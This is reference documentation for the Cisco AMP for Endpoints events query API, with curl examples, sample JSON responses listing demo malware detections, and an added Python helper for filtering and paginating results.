Cisco AMP for Endpoints API

GET /v0/events

Description

This is a general query interface for events. This is analogous to the Events view on the FireAMP Console.

Events can be filtered by a variety of criteria. Each criterion type is logically ANDed with the other criteria; multiple values given for the same criterion are logically ORed. For example, the query string connector_guid[]=ead39d47-93bd-4230-b692-454b433faf96&event_type[]=2164260868&event_type[]=1090519054 returns events that match the connector GUID ead39d47-93bd-4230-b692-454b433faf96 AND have event type (1090519054 OR 2164260868).

The arguments passed to the event_type and group_guid parameters can be retrieved from their respective endpoints.

Query Parameters

Name                Type                   Example Values                                                    Description
detection_sha256    String                 f8a6a244138cb1e2f044f63f3dc42beeb555da892bbd7a121274498cbdfc9ad5
application_sha256  String                 80ef843fa78c33b511394a9c7535a9cbace1deb2270e86ee4ad2faffa5b1e7d2
limit               Integer                1, 2, 10
connector_guid[]    GUID                   af73d9d5-ddc5-4c93-9c6d-d5e6b5c5eb01
group_guid[]        GUID                   b077d6bc-bbdf-42f7-8838-a06053fbd98a
start_date          String (Time ISO8601)  2015-10-01T00:00:00+00:00                                         Inclusive (the list will include events that match start_date)
offset              Integer                10
event_type[]        Array                  1090519054, 1090519084
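The filter semantics described above (AND across criterion types, OR within one criterion) and the key[]=value encoding the requests below use, worked through in Python as an added example that is not part of Cisco's documentation or of any Cisco SDK. It assumes a caller-supplied fetch_json(url) that performs the authenticated GET and returns the decoded JSON body; a constructed offline stand-in plays that role here, and the mapping of application_sha256 to file.parent.identity.sha256 is inferred from the page's own detection_sha256/application_sha256 example rather than stated by the page.

```python
"""Query helpers for GET /v0/events (added example, not Cisco's code).
Assumed, not on the page: a caller-supplied fetch_json(url) that performs the
authenticated GET and returns the decoded JSON body; fake_fetch_json below is a
constructed offline stand-in for it."""
from datetime import datetime
from urllib.parse import parse_qs, urlencode, urlsplit

BASE_URL = "https://api.eu.amp.cisco.com/v0/events"  # EU cloud, as in the page's examples

def build_events_url(base=BASE_URL, **criteria):
    """Scalars -> key=value; lists -> repeated key[]=value pairs (urlencode renders key%5B%5D=value)."""
    pairs = []
    for key, value in criteria.items():
        if isinstance(value, (list, tuple, set)):
            pairs.extend((key + "[]", str(v)) for v in value)
        else:
            pairs.append((key, str(value)))
    return base + "?" + urlencode(pairs) if pairs else base

def _dig(obj, *path):
    """Walk nested dicts; None if any key is missing (e.g. an event with no file.parent)."""
    for key in path:
        if not isinstance(obj, dict) or key not in obj:
            return None
        obj = obj[key]
    return obj

# Where each filterable criterion lives in an event record (application_sha256: inferred from the page's example).
FIELD_OF = {
    "connector_guid": lambda e: [e.get("connector_guid")],
    "group_guid": lambda e: e.get("group_guids", []),
    "event_type": lambda e: [e.get("event_type_id")],
    "detection_sha256": lambda e: [_dig(e, "file", "identity", "sha256")],
    "application_sha256": lambda e: [_dig(e, "file", "parent", "identity", "sha256")],
}

def matches(event, **criteria):
    """Documented semantics: every criterion given must hold (AND), any listed value within one
    criterion suffices (OR), start_date is inclusive. Unknown criteria raise instead of matching all."""
    for key, value in criteria.items():
        wanted = list(value) if isinstance(value, (list, tuple, set)) else [value]
        if key == "start_date":
            if datetime.fromisoformat(event["date"]) < datetime.fromisoformat(str(wanted[0])):
                return False
            continue
        if key not in FIELD_OF:
            raise ValueError(f"unknown criterion: {key}")
        present = {str(v) for v in FIELD_OF[key](event) if v is not None}
        if not any(str(w) in present for w in wanted):
            return False
    return True

def iter_events(fetch_json, url):
    """Follow metadata.links.next until the last page omits it; the seen set stops a looping link."""
    seen = set()
    while url and url not in seen:
        seen.add(url)
        body = fetch_json(url)
        yield from body["data"]
        url = body["metadata"]["links"].get("next")

def fetch_all(fetch_json, **criteria):
    return list(iter_events(fetch_json, build_events_url(**criteria)))

def _ev(n, date, etype, connector, group, sha=None, parent=None):
    e = {"id": n, "date": date, "event_type_id": etype,
         "connector_guid": connector, "group_guids": [group]}
    if sha:
        e["file"] = {"identity": {"sha256": sha}}
        if parent:
            e["file"]["parent"] = {"identity": {"sha256": parent}}
    return e

# Constructed sample events (newest first, as the API lists them) with placeholder identifiers.
SAMPLE_EVENTS = [
    _ev(1, "2021-05-05T23:20:38+00:00", 1090519054, "conn-1", "grp-1", "sha-f1", "sha-p1"),
    _ev(2, "2021-05-05T23:20:06+00:00", 1090519054, "conn-1", "grp-1", "sha-f1", "sha-p1"),
    _ev(3, "2021-05-05T22:27:39+00:00", 1090519054, "conn-2", "grp-2", "sha-f2"),
    _ev(4, "2021-05-04T10:00:00+00:00", 2164260868, "conn-2", "grp-2"),
    _ev(5, "2021-05-03T08:15:00+00:00", 1090519084, "conn-3", "grp-1", "sha-f3", "sha-p1"),
]

def fake_fetch_json(url):
    """Offline stand-in for the HTTP GET: filters SAMPLE_EVENTS by the query string and pages with
    limit/offset, emitting a next link as the API does. A real fetcher should also honour the
    x-ratelimit-remaining / x-ratelimit-reset headers shown in the page's responses."""
    q = parse_qs(urlsplit(url).query)
    limit = int(q.pop("limit", ["500"])[0])
    offset = int(q.pop("offset", ["0"])[0])
    criteria = {k[:-2] if k.endswith("[]") else k: v if k.endswith("[]") else v[0]
                for k, v in q.items()}  # repeated key[]=v pairs stay lists
    hits = [e for e in SAMPLE_EVENTS if matches(e, **criteria)]
    page = hits[offset:offset + limit]
    links = {"self": url}
    if offset + limit < len(hits):
        links["next"] = build_events_url(**criteria, limit=limit, offset=offset + limit)
    results = {"total": len(hits), "current_item_count": len(page), "index": offset, "items_per_page": limit}
    return {"version": "v0.2.2", "metadata": {"links": links, "results": results}, "data": page}
```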

Response Fields

Name                                        Type                   Description
version                                     String
metadata.links.self                         String
metadata.links.prev                         String
metadata.links.next                         String
metadata.results.total                      Integer
metadata.results.current_item_count         Integer
metadata.results.index                      Integer
metadata.results.items_per_page             Integer
data                                        Array
data[].id                                   Integer
data[].timestamp                            Integer
data[].timestamp_nanoseconds                Integer
data[].date                                 String (Time ISO8601)
data[].event_type                           String
data[].event_type_id                        Integer
data[].detection                            String
data[].detection_id                         String
data[].group_guids                          Array
data[].group_guids[]                        GUID
data[].computer.connector_guid              GUID
data[].computer.hostname                    String
data[].computer.external_ip                 String
data[].computer.user                        String
data[].computer.active                      Boolean
data[].computer.network_addresses           Array
data[].computer.network_addresses[].ip      String
data[].computer.network_addresses[].mac     String
data[].computer.links.computer              String
data[].computer.links.trajectory            String
data[].computer.links.group                 String
data[].file.disposition                     String
data[].file.file_name                       String
data[].file.file_path                       String
data[].file.identity.sha256                 String
data[].file.identity.sha1                   String
data[].file.identity.md5                    String
data[].file.parent.process_id               Integer
data[].file.parent.disposition              String
data[].file.parent.file_name                String
data[].file.parent.identity.sha256          String
data[].file.parent.identity.sha1            String
data[].file.parent.identity.md5             String

Examples

Fetch list of events sorted in descending order by timestamp
Fetch list of events filtered by connector_guid
Fetch list of events filtered by group_guid
Fetch list of events filtered by detection_sha256 and application_sha256
Fetch list of events filtered by event_type
Fetch list of Behavioral Protection Detection events
Fetch events that are newer than a given timestamp
Fetch list of events filtered by SCAN_STARTED event type

Fetch list of events sorted in descending order by timestamp

Request

Requires Authorization
GET /v0/events?limit=2
Headers
accept: application/json
content-type: application/json
accept-encoding: identity
authorization: Basic FILTERED

cURL

curl -X GET \
-H 'accept: application/json' \
-H 'content-type: application/json' \
-H 'accept-encoding: identity' \
-u YOUR_API_CLIENT_ID \
'https://api.eu.amp.cisco.com/v0/events?limit=2'

Response

Shortened for readability

content-type: application/json; charset=utf-8
transfer-encoding: chunked
status: 200 OK
x-ratelimit-limit: 3000
x-ratelimit-reset: 1976
referrer-policy: strict-origin-when-cross-origin
x-ratelimit-remaining: 2830
x-permitted-cross-domain-policies: none
x-download-options: noopen
etag: W/"5bde671776a159b21ee4fa7f532d5674"
x-frame-options: SAMEORIGIN
x-ratelimit-resetdate: 2021-05-05T23:55:49Z
strict-transport-security: max-age=31536000
{
  "version": "v0.2.2",
  "metadata": {
    "links": {
      "self": "https://api.eu.amp.cisco.com/v0/events?limit=2",
      "next": "https://api.eu.amp.cisco.com/v0/events?limit=2&offset=2"
    },
    "results": {
      "total": 975,
      "current_item_count": 2,
      "index": 0,
      "items_per_page": 2
    }
  },
  "data": [
    {
      "id": 6180352115244794000,
      "timestamp": 1620256838,
      "timestamp_nanoseconds": 279000000,
      "date": "2021-05-05T23:20:38+00:00",
      "event_type": "Threat Detected",
      "event_type_id": 1090519054,
      "detection": "W32.GenericKD:ZVETJ.18gs.1201",
      "detection_id": "6180352115244793858",
      "connector_guid": "99f403ce-bee9-4b7a-97f0-c3e39e39078c",
      "group_guids": [
        "e766a0e9-96da-41b9-b1e8-87dd010d6b68"
      ],
      "severity": "Medium",
      "computer": {
        "connector_guid": "99f403ce-bee9-4b7a-97f0-c3e39e39078c",
        "hostname": "Demo_Upatre",
        "external_ip": "49.223.159.99",
        "user": "A@TEMPLATE-W7X86",
        "active": true,
        "network_addresses": [
          {
            "ip": "124.144.186.238",
            "mac": "d6:bb:ea:b6:98:4a"
          }
        ],
        "links": {
          "computer": "https://api.eu.amp.cisco.com/v0/computers/99f403ce-bee9-4b7a-97f0-c3e39e39078c",
          "trajectory": "https://api.eu.amp.cisco.com/v0/computers/99f403ce-bee9-4b7a-97f0-c3e39e39078c/trajectory",
          "group": "https://api.eu.amp.cisco.com/v0/groups/b077d6bc-bbdf-42f7-8838-a06053fbd98a"
        }
      },
      "file": {
        "disposition": "Malicious",
        "file_name": "wsymqyv90.exe",
        "file_path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe",
        "identity": {
          "sha256": "b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40",
          "sha1": "70aef829bec17195e6c8ec0e6cba0ed39f97ba48",
          "md5": "e2f5dcd966e26d54329e8d79c7201652"
        },
        "parent": {
          "process_id": 4040,
          "disposition": "Clean",
          "file_name": "iexplore.exe",
          "identity": {
            "sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132",
            "sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80",
            "md5": "b3581f426dc500a51091cdd5bacf0454"
          }
        }
      }
    },
    {
      "id": 6180351977805840000,
      "timestamp": 1620256806,
      "timestamp_nanoseconds": 548000000,
      "date": "2021-05-05T23:20:06+00:00",
      "event_type": "Threat Detected",
      "event_type_id": 1090519054,
      "detection": "W32.GenericKD:ZVETJ.18gs.1201",
      "detection_id": "6180351977805840385",
      "connector_guid": "99f403ce-bee9-4b7a-97f0-c3e39e39078c",
      "group_guids": [
        "e766a0e9-96da-41b9-b1e8-87dd010d6b68"
      ],
      "severity": "Medium",
      "computer": {
        "connector_guid": "99f403ce-bee9-4b7a-97f0-c3e39e39078c",
        "hostname": "Demo_Upatre",
        "external_ip": "49.223.159.99",
        "user": "A@TEMPLATE-W7X86",
        "active": true,
        "network_addresses": [
          {
            "ip": "124.144.186.238",
            "mac": "d6:bb:ea:b6:98:4a"
          }
        ],
        "links": {
          "computer": "https://api.eu.amp.cisco.com/v0/computers/99f403ce-bee9-4b7a-97f0-c3e39e39078c",
          "trajectory": "https://api.eu.amp.cisco.com/v0/computers/99f403ce-bee9-4b7a-97f0-c3e39e39078c/trajectory",
          "group": "https://api.eu.amp.cisco.com/v0/groups/b077d6bc-bbdf-42f7-8838-a06053fbd98a"
        }
      },
      "file": {
        "disposition": "Malicious",
        "file_name": "wsymqyv90.exe",
        "file_path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe",
        "identity": {
          "sha256": "b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40",
          "sha1": "70aef829bec17195e6c8ec0e6cba0ed39f97ba48",
          "md5": "e2f5dcd966e26d54329e8d79c7201652"
        },
        "parent": {
          "process_id": 4040,
          "disposition": "Clean",
          "file_name": "iexplore.exe",
          "identity": {
            "sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132",
            "sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80",
            "md5": "b3581f426dc500a51091cdd5bacf0454"
          }
        }
      }
    }
  ]
}

Fetch list of events filtered by connector_guid

Request

Requires Authorization
GET /v0/events?connector_guid%5B%5D=99f403ce-bee9-4b7a-97f0-c3e39e39078c&limit=1
Headers
accept: application/json
content-type: application/json
accept-encoding: identity
authorization: Basic FILTERED

cURL

curl -X GET \
-H 'accept: application/json' \
-H 'content-type: application/json' \
-H 'accept-encoding: identity' \
-u YOUR_API_CLIENT_ID \
'https://api.eu.amp.cisco.com/v0/events?connector_guid%5B%5D=99f403ce-bee9-4b7a-97f0-c3e39e39078c&limit=1'

Response

Shortened for readability

content-type: application/json; charset=utf-8
transfer-encoding: chunked
status: 200 OK
x-ratelimit-limit: 3000
x-ratelimit-reset: 1974
referrer-policy: strict-origin-when-cross-origin
x-ratelimit-remaining: 2829
x-permitted-cross-domain-policies: none
x-download-options: noopen
etag: W/"0d1a3dbc3f2dc80cb57213ec2ab55d90"
x-frame-options: SAMEORIGIN
x-ratelimit-resetdate: 2021-05-05T23:55:49Z
strict-transport-security: max-age=31536000
{
  "version": "v0.2.2",
  "metadata": {
    "links": {
      "self": "https://api.eu.amp.cisco.com/v0/events?connector_guid%5B%5D=99f403ce-bee9-4b7a-97f0-c3e39e39078c&limit=1",
      "next": "https://api.eu.amp.cisco.com/v0/events?connector_guid%5B%5D=99f403ce-bee9-4b7a-97f0-c3e39e39078c&limit=1&offset=1"
    },
    "results": {
      "total": 34,
      "current_item_count": 1,
      "index": 0,
      "items_per_page": 1
    }
  },
  "data": [
    {
      "id": 6180352115244794000,
      "timestamp": 1620256838,
      "timestamp_nanoseconds": 279000000,
      "date": "2021-05-05T23:20:38+00:00",
      "event_type": "Threat Detected",
      "event_type_id": 1090519054,
      "detection": "W32.GenericKD:ZVETJ.18gs.1201",
      "detection_id": "6180352115244793858",
      "connector_guid": "99f403ce-bee9-4b7a-97f0-c3e39e39078c",
      "group_guids": [
        "e766a0e9-96da-41b9-b1e8-87dd010d6b68"
      ],
      "severity": "Medium",
      "computer": {
        "connector_guid": "99f403ce-bee9-4b7a-97f0-c3e39e39078c",
        "hostname": "Demo_Upatre",
        "external_ip": "49.223.159.99",
        "user": "A@TEMPLATE-W7X86",
        "active": true,
        "network_addresses": [
          {
            "ip": "124.144.186.238",
            "mac": "d6:bb:ea:b6:98:4a"
          }
        ],
        "links": {
          "computer": "https://api.eu.amp.cisco.com/v0/computers/99f403ce-bee9-4b7a-97f0-c3e39e39078c",
          "trajectory": "https://api.eu.amp.cisco.com/v0/computers/99f403ce-bee9-4b7a-97f0-c3e39e39078c/trajectory",
          "group": "https://api.eu.amp.cisco.com/v0/groups/b077d6bc-bbdf-42f7-8838-a06053fbd98a"
        }
      },
      "file": {
        "disposition": "Malicious",
        "file_name": "wsymqyv90.exe",
        "file_path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe",
        "identity": {
          "sha256": "b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40",
          "sha1": "70aef829bec17195e6c8ec0e6cba0ed39f97ba48",
          "md5": "e2f5dcd966e26d54329e8d79c7201652"
        },
        "parent": {
          "process_id": 4040,
          "disposition": "Clean",
          "file_name": "iexplore.exe",
          "identity": {
            "sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132",
            "sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80",
            "md5": "b3581f426dc500a51091cdd5bacf0454"
          }
        }
      }
    }
  ]
}

Fetch list of events filtered by group_guid

Request

Requires Authorization
GET /v0/events?group_guid%5B%5D=e766a0e9-96da-41b9-b1e8-87dd010d6b68&limit=1
Headers
accept: application/json
content-type: application/json
accept-encoding: identity
authorization: Basic FILTERED

cURL

curl -X GET \
-H 'accept: application/json' \
-H 'content-type: application/json' \
-H 'accept-encoding: identity' \
-u YOUR_API_CLIENT_ID \
'https://api.eu.amp.cisco.com/v0/events?group_guid%5B%5D=e766a0e9-96da-41b9-b1e8-87dd010d6b68&limit=1'

Response

Shortened for readability

content-type: application/json; charset=utf-8
transfer-encoding: chunked
status: 200 OK
x-ratelimit-limit: 3000
x-ratelimit-reset: 1973
referrer-policy: strict-origin-when-cross-origin
x-ratelimit-remaining: 2828
x-permitted-cross-domain-policies: none
x-download-options: noopen
etag: W/"677fa441bf5906804820b16ce3ff823f"
x-frame-options: SAMEORIGIN
x-ratelimit-resetdate: 2021-05-05T23:55:49Z
strict-transport-security: max-age=31536000
{
  "version": "v0.2.2",
  "metadata": {
    "links": {
      "self": "https://api.eu.amp.cisco.com/v0/events?group_guid%5B%5D=e766a0e9-96da-41b9-b1e8-87dd010d6b68&limit=1",
      "next": "https://api.eu.amp.cisco.com/v0/events?group_guid%5B%5D=e766a0e9-96da-41b9-b1e8-87dd010d6b68&limit=1&offset=1"
    },
    "results": {
      "total": 279,
      "current_item_count": 1,
      "index": 0,
      "items_per_page": 1
    }
  },
  "data": [
    {
      "id": 6180352115244794000,
      "timestamp": 1620256838,
      "timestamp_nanoseconds": 279000000,
      "date": "2021-05-05T23:20:38+00:00",
      "event_type": "Threat Detected",
      "event_type_id": 1090519054,
      "detection": "W32.GenericKD:ZVETJ.18gs.1201",
      "detection_id": "6180352115244793858",
      "connector_guid": "99f403ce-bee9-4b7a-97f0-c3e39e39078c",
      "group_guids": [
        "e766a0e9-96da-41b9-b1e8-87dd010d6b68"
      ],
      "severity": "Medium",
      "computer": {
        "connector_guid": "99f403ce-bee9-4b7a-97f0-c3e39e39078c",
        "hostname": "Demo_Upatre",
        "external_ip": "49.223.159.99",
        "user": "A@TEMPLATE-W7X86",
        "active": true,
        "network_addresses": [
          {
            "ip": "124.144.186.238",
            "mac": "d6:bb:ea:b6:98:4a"
          }
        ],
        "links": {
          "computer": "https://api.eu.amp.cisco.com/v0/computers/99f403ce-bee9-4b7a-97f0-c3e39e39078c",
          "trajectory": "https://api.eu.amp.cisco.com/v0/computers/99f403ce-bee9-4b7a-97f0-c3e39e39078c/trajectory",
          "group": "https://api.eu.amp.cisco.com/v0/groups/b077d6bc-bbdf-42f7-8838-a06053fbd98a"
        }
      },
      "file": {
        "disposition": "Malicious",
        "file_name": "wsymqyv90.exe",
        "file_path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe",
        "identity": {
          "sha256": "b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40",
          "sha1": "70aef829bec17195e6c8ec0e6cba0ed39f97ba48",
          "md5": "e2f5dcd966e26d54329e8d79c7201652"
        },
        "parent": {
          "process_id": 4040,
          "disposition": "Clean",
          "file_name": "iexplore.exe",
          "identity": {
            "sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132",
            "sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80",
            "md5": "b3581f426dc500a51091cdd5bacf0454"
          }
        }
      }
    }
  ]
}

Fetch list of events filtered by detection_sha256 and application_sha256

Request

Requires Authorization
GET /v0/events?detection_sha256=b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40&application_sha256=b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132&limit=1
Headers
accept: application/json
content-type: application/json
accept-encoding: identity
authorization: Basic FILTERED

cURL

curl -X GET \
-H 'accept: application/json' \
-H 'content-type: application/json' \
-H 'accept-encoding: identity' \
-u YOUR_API_CLIENT_ID \
'https://api.eu.amp.cisco.com/v0/events?detection_sha256=b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40&application_sha256=b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132&limit=1'

Response

Shortened for readability

content-type: application/json; charset=utf-8
transfer-encoding: chunked
status: 200 OK
x-ratelimit-limit: 3000
x-ratelimit-reset: 1971
referrer-policy: strict-origin-when-cross-origin
x-ratelimit-remaining: 2827
x-permitted-cross-domain-policies: none
x-download-options: noopen
etag: W/"43edcc73840ac14aab1427b42803d4aa"
x-frame-options: SAMEORIGIN
x-ratelimit-resetdate: 2021-05-05T23:55:49Z
strict-transport-security: max-age=31536000
{
  "version": "v0.2.2",
  "metadata": {
    "links": {
      "self": "https://api.eu.amp.cisco.com/v0/events?detection_sha256=b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40&application_sha256=b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132&limit=1",
      "next": "https://api.eu.amp.cisco.com/v0/events?detection_sha256=b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40&application_sha256=b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132&limit=1&offset=1"
    },
    "results": {
      "total": 2,
      "current_item_count": 1,
      "index": 0,
      "items_per_page": 1
    }
  },
  "data": [
    {
      "id": 6180352115244794000,
      "timestamp": 1620256838,
      "timestamp_nanoseconds": 279000000,
      "date": "2021-05-05T23:20:38+00:00",
      "event_type": "Threat Detected",
      "event_type_id": 1090519054,
      "detection": "W32.GenericKD:ZVETJ.18gs.1201",
      "detection_id": "6180352115244793858",
      "connector_guid": "99f403ce-bee9-4b7a-97f0-c3e39e39078c",
      "group_guids": [
        "e766a0e9-96da-41b9-b1e8-87dd010d6b68"
      ],
      "severity": "Medium",
      "computer": {
        "connector_guid": "99f403ce-bee9-4b7a-97f0-c3e39e39078c",
        "hostname": "Demo_Upatre",
        "external_ip": "49.223.159.99",
        "user": "A@TEMPLATE-W7X86",
        "active": true,
        "network_addresses": [
          {
            "ip": "124.144.186.238",
            "mac": "d6:bb:ea:b6:98:4a"
          }
        ],
        "links": {
          "computer": "https://api.eu.amp.cisco.com/v0/computers/99f403ce-bee9-4b7a-97f0-c3e39e39078c",
          "trajectory": "https://api.eu.amp.cisco.com/v0/computers/99f403ce-bee9-4b7a-97f0-c3e39e39078c/trajectory",
          "group": "https://api.eu.amp.cisco.com/v0/groups/b077d6bc-bbdf-42f7-8838-a06053fbd98a"
        }
      },
      "file": {
        "disposition": "Malicious",
        "file_name": "wsymqyv90.exe",
        "file_path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe",
        "identity": {
          "sha256": "b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40",
          "sha1": "70aef829bec17195e6c8ec0e6cba0ed39f97ba48",
          "md5": "e2f5dcd966e26d54329e8d79c7201652"
        },
        "parent": {
          "process_id": 4040,
          "disposition": "Clean",
          "file_name": "iexplore.exe",
          "identity": {
            "sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132",
            "sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80",
            "md5": "b3581f426dc500a51091cdd5bacf0454"
          }
        }
      }
    }
  ]
}

Fetch list of events filtered by event_type

Request

Requires Authorization
GET /v0/events?event_type%5B%5D=1090519054&event_type%5B%5D=1090519084&offset=10&limit=10
Headers
accept: application/json
content-type: application/json
accept-encoding: identity
authorization: Basic FILTERED

cURL

curl -X GET \
-H 'accept: application/json' \
-H 'content-type: application/json' \
-H 'accept-encoding: identity' \
-u YOUR_API_CLIENT_ID \
'https://api.eu.amp.cisco.com/v0/events?event_type%5B%5D=1090519054&event_type%5B%5D=1090519084&offset=10&limit=10'

Response

Shortened for readability

content-type: application/json; charset=utf-8
transfer-encoding: chunked
status: 200 OK
x-ratelimit-limit: 3000
x-ratelimit-reset: 1971
referrer-policy: strict-origin-when-cross-origin
x-ratelimit-remaining: 2826
x-permitted-cross-domain-policies: none
x-download-options: noopen
etag: W/"f80e7bf82de8d3912fb66af4ca683088"
x-frame-options: SAMEORIGIN
x-ratelimit-resetdate: 2021-05-05T23:55:49Z
strict-transport-security: max-age=31536000
{
  "version": "v0.2.2",
  "metadata": {
    "links": {
      "self": "https://api.eu.amp.cisco.com/v0/events?event_type%5B%5D=1090519054&event_type%5B%5D=1090519084&offset=10&limit=10",
      "prev": "https://api.eu.amp.cisco.com/v0/events?event_type%5B%5D=1090519054&event_type%5B%5D=1090519084&limit=10&offset=0",
      "next": "https://api.eu.amp.cisco.com/v0/events?event_type%5B%5D=1090519054&event_type%5B%5D=1090519084&limit=10&offset=20"
    },
    "results": {
      "total": 606,
      "current_item_count": 10,
      "index": 10,
      "items_per_page": 10
    }
  },
  "data": [
    {
      "id": 6533671385032557000,
      "timestamp": 1620253659,
      "timestamp_nanoseconds": 14000000,
      "date": "2021-05-05T22:27:39+00:00",
      "event_type": "Threat Detected",
      "event_type_id": 1090519054,
      "detection": "W32.File.MalParent",
      "detection_id": "6533671380737589309",
      "connector_guid": "5639a4f8-76e5-4c15-9f52-12da75bc4185",
      "group_guids": [
        "6a208a97-badf-4296-87c2-40779ffff0af"
      ],
      "severity": "Medium",
      "computer": {
        "connector_guid": "5639a4f8-76e5-4c15-9f52-12da75bc4185",
        "hostname": "Demo_AMP_Threat_Audit",
        "external_ip": "21.207.234.38",
        "user": "johndoe",
        "active": true,
        "network_addresses": [
          {
            "ip": "238.85.81.101",
            "mac": "9e:47:ce:f6:82:2c"
          }
        ],
        "links": {
          "computer": "https://api.eu.amp.cisco.com/v0/computers/5639a4f8-76e5-4c15-9f52-12da75bc4185",
          "trajectory": "https://api.eu.amp.cisco.com/v0/computers/5639a4f8-76e5-4c15-9f52-12da75bc4185/trajectory",
          "group": "https://api.eu.amp.cisco.com/v0/groups/6c3c2005-4c74-4ba7-8dbb-c4d5b6bafe03"
        }
      },
      "file": {
        "disposition": "Malicious",
        "file_name": "ekjrngjker.exe",
        "file_path": "C:\\ekjrngjker.exe",
        "identity": {
          "sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
          "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
          "md5": "b99e0a8c56f963246b6464b9fffbf7a2"
        }
      }
    },
    {
      "id": 6533671380737589000,
      "timestamp": 1620253658,
      "timestamp_nanoseconds": 605000000,
      "date": "2021-05-05T22:27:38+00:00",
      "event_type": "Threat Detected",
      "event_type_id": 1090519054,
      "detection": "W32.File.MalParent",
      "detection_id": "6533671380737589308",
      "connector_guid": "5639a4f8-76e5-4c15-9f52-12da75bc4185",
      "group_guids": [
        "6a208a97-badf-4296-87c2-40779ffff0af"
      ],
      "severity": "Medium",
      "computer": {
        "connector_guid": "5639a4f8-76e5-4c15-9f52-12da75bc4185",
        "hostname": "Demo_AMP_Threat_Audit",
        "external_ip": "21.207.234.38",
        "user": "johndoe",
        "active": true,
        "network_addresses": [
          {
            "ip": "238.85.81.101",
            "mac": "9e:47:ce:f6:82:2c"
          }
        ],
        "links": {
          "computer": "https://api.eu.amp.cisco.com/v0/computers/5639a4f8-76e5-4c15-9f52-12da75bc4185",
          "trajectory": "https://api.eu.amp.cisco.com/v0/computers/5639a4f8-76e5-4c15-9f52-12da75bc4185/trajectory",
          "group": "https://api.eu.amp.cisco.com/v0/groups/6c3c2005-4c74-4ba7-8dbb-c4d5b6bafe03"
        }
      },
      "file": {
        "disposition": "Malicious",
        "file_name": "ekjrngjker.exe",
        "file_path": "C:\\ekjrngjker.exe",
        "identity": {
          "sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
          "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
          "md5": "b99e0a8c56f963246b6464b9fffbf7a2"
        }
      }
    }
  ]
}

Fetch list of Behavioral Protection Detection events

Request

Requires Authorization
GET /v0/events?event_type%5B%5D=553648222&limit=2
Headers
accept: application/json
content-type: application/json
accept-encoding: identity
authorization: Basic FILTERED

cURL

curl -X GET \
-H 'accept: application/json' \
-H 'content-type: application/json' \
-H 'accept-encoding: identity' \
-u YOUR_API_CLIENT_ID \
'https://api.eu.amp.cisco.com/v0/events?event_type%5B%5D=553648222&limit=2'

Response

Shortened for readability

content-type: application/json; charset=utf-8
transfer-encoding: chunked
status: 200 OK
x-ratelimit-limit: 3000
x-ratelimit-reset: 1971
referrer-policy: strict-origin-when-cross-origin
x-ratelimit-remaining: 2825
x-permitted-cross-domain-policies: none
x-download-options: noopen
etag: W/"c79587a5226d5bbc2d8bd1b46b543711"
x-frame-options: SAMEORIGIN
x-ratelimit-resetdate: 2021-05-05T23:55:49Z
strict-transport-security: max-age=31536000
{
  "version": "v0.2.2",
  "metadata": {
    "links": {
      "self": "https://api.eu.amp.cisco.com/v0/events?event_type%5B%5D=553648222&limit=2",
      "next": "https://api.eu.amp.cisco.com/v0/events?event_type%5B%5D=553648222&limit=2&offset=2"
    },
    "results": {
      "total": 18,
      "current_item_count": 2,
      "index": 0,
      "items_per_page": 2
    }
  },
  "data": [
    {
      "id": 6880683125978957000,
      "timestamp": 1620188084,
      "timestamp_nanoseconds": 791000000,
      "date": "2021-05-05T04:14:44+00:00",
      "event_type": "Threat Detection",
      "event_type_id": 553648222,
      "detection": "PowerShell Download String",
      "connector_guid": "2c846819-d267-4b76-9225-3709b97e3f78",
      "group_guids": [
        "3aef61ae-a41f-4a89-a47d-1ce96164eea8"
      ],
      "severity": "Medium",
      "computer": {
        "connector_guid": "2c846819-d267-4b76-9225-3709b97e3f78",
        "hostname": "Demo_BP_WMIPRVSE",
        "external_ip": "145.238.35.100",
        "active": true,
        "network_addresses": [
          {
            "ip": "166.65.137.252",
            "mac": "8a:26:b5:30:1f:04"
          }
        ],
        "links": {
          "computer": "https://api.eu.amp.cisco.com/v0/computers/2c846819-d267-4b76-9225-3709b97e3f78",
